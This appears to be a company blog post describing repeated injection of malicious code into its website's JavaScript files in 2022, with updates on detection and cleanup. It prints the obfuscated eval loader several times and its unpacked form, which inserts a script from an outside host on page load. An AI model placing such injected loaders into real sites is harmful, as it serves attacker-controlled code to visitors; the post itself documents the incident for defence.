Exposing the Attack on the Website

Background

We found weird one of our websites as the link not be able to go to the proper URL with the domain, and in fact, it went to a third-party link. That’s quite alarming. We then checked Google Analytics, and the traffic went down. There was something not right here!

Last updated - 18/06/2022:  Add the Update - 2 section. 

The Detail

We checked the files on the server, and there was a change on 17/04/2022. That was strange as we did not change the files.

We open up the modified by we found this at the end of the .js file. We look up the backup, and it’s different; there is no code for this:

eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1.23(\'6\',7(){8(9 3.2=="10"){11 0=1.12("5");0.14="//15-13.17/18?19=20";1.21.22(0);3.2="16"}},4);',10,24,'s|document|web_security|window|false|script|DOMContentLoaded|function|if|typeof|undefined|var|createElement|security|src|web|success|cloud|event|l|115|head|appendChild|addEventListener'.split('|'),0,{}))
;;
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1.23(\'6\',7(){8(9 3.2=="10"){11 0=1.12("5");0.14="//15-13.17/18?19=20";1.21.22(0);3.2="16"}},4);',10,24,'s|document|web_security|window|false|script|DOMContentLoaded|function|if|typeof|undefined|var|createElement|security|src|web|success|cloud|event|l|115|head|appendChild|addEventListener'.split('|'),0,{}))
;;
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1.23(\'6\',7(){8(9 3.2=="10"){11 0=1.12("5");0.14="//15-13.17/18?19=20";1.21.22(0);3.2="16"}},4);',10,24,'s|document|web_security|window|false|script|DOMContentLoaded|function|if|typeof|undefined|var|createElement|security|src|web|success|cloud|event|l|115|head|appendChild|addEventListener'.split('|'),0,{}))
;;
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1.23(\'6\',7(){8(9 3.2=="10"){11 0=1.12("5");0.14="//15-13.17/18?19=20";1.21.22(0);3.2="16"}},4);',10,24,'s|document|web_security|window|false|script|DOMContentLoaded|function|if|typeof|undefined|var|createElement|security|src|web|success|cloud|event|l|115|head|appendChild|addEventListener'.split('|'),0,{}))
;

We had this situation before in late September 2021, and at that time, it was attacked on .php files.

At this stage, we do not know how they appending this extra code at the end of the js file.

However, we might have to figure out 3 ways that the hacker can attack this:

  • Hosting VM using CPanel – not fully control
  • Custom code PHP web application
  • WordPress websites

To mitigate this, we moved the custom code PHP application to a different VM that we can fully control and has no CPanel, while the WordPress site moved to another VM that we can fully control and has no CPanel. We also have some alerts on checking the files if there is a modification/delete/adding.

UPDATE – 1

This happens again on 4th June 2022, this time attacking js files.

;
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1.23(\'6\',7(){8(9 3.2=="10"){11 0=1.12("5");0.14="//15-13.17/18?19=20";1.21.22(0);3.2="16"}},4);',10,24,'s|document|web_security|window|false|script|DOMContentLoaded|function|if|typeof|undefined|var|createElement|security|src|web|success|cloud|event|l|115|head|appendChild|addEventListener'.split('|'),0,{}))
;

Investigate further about these extra codes and find Unpacker from Matthewfl.com:

Those codes translate as :

document.addEventListener('DOMContentLoaded',function()
	{
	if(typeof window.web_security=="undefined")
		{
		var s=document.createElement("script");
		s.src="//web-security.cloud/event?l=115";
		document.head.appendChild(s);
		window.web_security="success"
	}
}
,false);

To search all affected files (JS or PHP), run the following command and this write into a file called – suspiciousfiles.txt

grep --include=\*.{js,php} -rnw '/var/www/[website_url/public_html/' -e "s|document|web_security|window" > suspiciousfiles.txt

Go through that list and remove the extra codes manually one by one.

UPDATE – 2

On 14th June 2022, as informed by our web developer, we upgraded the web application, and one of the bug fixes is related to updating the JQuery library to prevent JavaScript vulnerabilities.

We believe this incident is related to JavaScript vulnerabilities within this web application. We hope this will solve the issue.

UPDATE – 3

On 27 July 2022, the website was attacked again, just .js files. It has 400+ files with extra codes at the end. We managed to remove this manually.

The End

If you have reached the end of this article, congratulation. Hopefully, we have shed some light on outlining what you need to know by exposing the attack on the website.

We write this so that this is not a fixed article. Like in this journey, We learn as we go and re-write some parts of the article, so please keep pinging with this article or any general tech posts.

We also would love to hear about how you deal with the situation and what IT-related challenges you might face. Please feel free to comment below this article, or you can contact us on the Dewacorp website for your IT support, application integration, application development, or other IT-related. Alternatively, you can casually have a chat on Dewachat. Let us know if you have any questions that we can help with!

Big thank you for the photo by Tima Miroshnichenko on Pexels.

To boost your product and service to the broader web community, visit our Dewalist classified website – home to 30,000+ active users and 40,000+ active advertising so far. Check it out!

If you love this security article or any security posts and you would like to receive an update of this article or our latest post, please sign up for the form below:

Newsletter signup

This is a newsletter for tech, creative, gadgets, games and crypto.

Please wait...

Thank you for sign up!